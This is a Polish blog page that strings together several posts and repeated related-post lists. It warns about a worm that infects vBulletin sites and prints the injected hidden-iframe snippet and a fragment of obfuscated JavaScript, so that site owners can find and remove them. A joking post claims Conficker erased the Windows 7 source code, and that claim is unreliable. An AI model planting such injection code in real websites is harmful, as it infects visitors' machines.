Coraz więcej stron otrzymuje ostrzeżenia i blokady od Google – w kodzie strony można znaleźć taki kod:
< !-- Google Optimization -- >
< iframe src='vboptimise/googlebot.php'
width=1 heigth=1 frameborder=0 >
< /iframe >
< !-- /Google Optimization -- >

Plik oczywiście nie służy optymalizacji strony, natomiast może spowodować pobranie złośliwego kodu przez użytkowników. Robak atakuje skrypt vBuletin, ciężko powiedzieć czy także inne skrypty. Fragment kodu i plik należy oczywiście usunąć, wcześniej zmieniając hasło dostępowe do ftp – nie należy go też zapamiętywać w kliencie ftp.

Related posts:

1. Przygody z gnidą ciąg dalszy Po zmianie hasła do ftp 1 dzień spokoju. Gnida to...
2. Nazwa pl jednak potrafi pozytywnie zaskoczyć Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...
3. Conficker – a jednak zaatakował Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...

Related posts:

1. Kolejny atak Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...
2. SEO Copywriting Rzeszów Moje wyniki mówią same za siebie. Mapka może przeskoczyć wyniki...
3. Conficker – a jednak zaatakował Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...

Conficker z pomocą milionów maszyn z całego świata zaatakował serwery microsoftu i usunął bezpowrotnie kod Windows Seven. Jak na razie nie wiadomo, czy backupy również zostały usunięte, ale prawdopodobnie tak, skoro „jedynym ratunkiem dla programistów pozostały kopie kodu z 23 marca”. Cały tydzień pracy poszedł na marne. I bardzo dobrze. MS i parówkowym skrytożercom mówimy NIE.

Jak wiadomo media kłamią

Related posts:

1. Conficker namierzony! Symantec dziś wieczorem wypuścił film, na którym zademonstrował jak wygląda...
2. Nazwa pl jednak potrafi pozytywnie zaskoczyć Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...
3. Uwaga na robaka w pliku googlebot.php Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...

Related posts:

1. Conficker – a jednak zaatakował Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...
2. Robal Robal opisany w poprzednim wpisie, jak się okazało, poczynił dość...
3. Kolejny atak Po wszystkich zabiegach zostałem zaatakowany ponownie. Tym razem zmieniłem hasło...

Related posts:

1. Nazwa pl jednak potrafi pozytywnie zaskoczyć Nazwa pl, bardzo nielubiany przeze mnie provider, dziś wyjątkowo mile...
2. Google po raz kolejny „zabiera” przestrzeń… Wprowadzone ostatnio w Google zmiany nie są chyba najszczęśliwsze. Menu...
3. Uwaga na robaka w pliku googlebot.php Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...

• przekierowywał na witryny zainfekowane, pomimo wpisania poprawnego url w pasek przeglądarki
• przekierowywał na zainfekowane witryny po kliknięciu w linki wyszukane przez google (co dziwne, gdy zajrzałem w źródło „google” był tam złośliwy kod, więc prawdopodobnie wyświetlał mi jakiś fake a nie właściwą stronę)
• nie pozwolił odpalić żadnego skanera on-line, a jeśli pozwolił, to skaner wieszał się
• zauważyłem problemy z wyświetlaniem plików z youtube
• spowodował zwisy systemu po starcie – system wisiał, natomiast dysk pracował na najwyższych obrotach
• utrudniał lub uniemożliwiał aktualizację antywirusów

Kodu należy szukać w plikach index. Podobno też często są modyfikowane .htaccess – ja nie zauważyłem modyfikacji. Niektórzy twierdzą, że dostaje się na serwery przez ftp – nie mogę tego potwierdzić, ponieważ spotkałem się z infekcją na różnych serwerach, z różnymi hasłami i różnych ludzi – choć możliwe, że to był zbieg okoliczności i faktycznie każdemu z nas skradziono hasła.

Kolejnym poważnym problemem jest to, że jedynie Kaspersky (tylko o nim do tej pory wiem) nie dopuszcza do otwarcia zainfekowanej witryny. Skanowanie zainfekowanego pliku AVG, Avirą, MKS nie dało rezultatów.

Related posts:

1. Conficker – a jednak zaatakował Jak podają specjalistyczne media, wirus, który miał zaatakować dzisiaj rzeczywiście...
2. Usuwanie ostrzeżenia z wyników wyszukiwania Google Bardzo wiele osób jest zaskoczonych, że w wynikach wyszukiwania pojawia...
3. Uwaga na robaka w pliku googlebot.php Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...

Do pliku index.php dopisują śmieci. Źródło strony po zainfekowaniu, po znaczniku /html; zawiera podobny kod. Usunięcie go jest bardzo wskazane:

ad –;script
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
qtndm=”";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
qtndm=”";
jlooz=3953;
gftzo=(9.007e3<=5e1?uyimh:qxcxg);
jjaqh=(ddytx<.2438?xkjpv:3.);
gmbpt=(7.3e1<=36?mzsrv:.45);

Related posts:

1. Blogi na wordpress.com WordPress usunął kilkadziesiąt moich blogów postawionych pod koniec 2009 roku....
2. Uwaga na robaka w pliku googlebot.php Wcześniej kilkukrotnie pisałem o robaku atakującym strony www i powodującym...